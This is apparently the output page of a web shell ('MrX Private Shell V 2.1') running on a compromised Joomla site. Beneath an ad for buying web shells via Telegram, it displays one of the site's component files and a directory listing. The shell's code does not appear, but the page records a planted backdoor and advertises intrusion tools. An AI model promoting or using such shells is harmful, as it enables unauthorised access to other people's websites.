__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * CustomTables Joomla! 3.x/4.x/5.x Component * @package Custom Tables * @author Ivan Komlev <[email protected]> * @link https://joomlaboat.com * @copyright (C) 2018-2024. Ivan Komlev * @license GNU/GPL Version 2 or later - https://www.gnu.org/licenses/gpl-2.0.html **/ // no direct access defined('_JEXEC') or die(); if ($this->ct->Env->isModal) { echo $this->editForm->render($this->row, $this->formLink, 'ctEditModalForm'); die;//Modal Edit Form } else echo $this->editForm->render($this->row, $this->formLink, 'ctEditForm'); ?> <!-- Modal content --> <div id="ctModal" class="ctModal"> <div id="ctModal_box" class="ctModal_content"> <span id="ctModal_close" class="ctModal_close">×</span> <div id="ctModal_content"></div> </div> </div> <!-- end of the modal -->';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 849 B | 0664 |
|
| default.xml | File | 10.22 KB | 0664 |
|
| index.html | File | 43 B | 0664 |
|
| json.php | File | 2.2 KB | 0664 |
|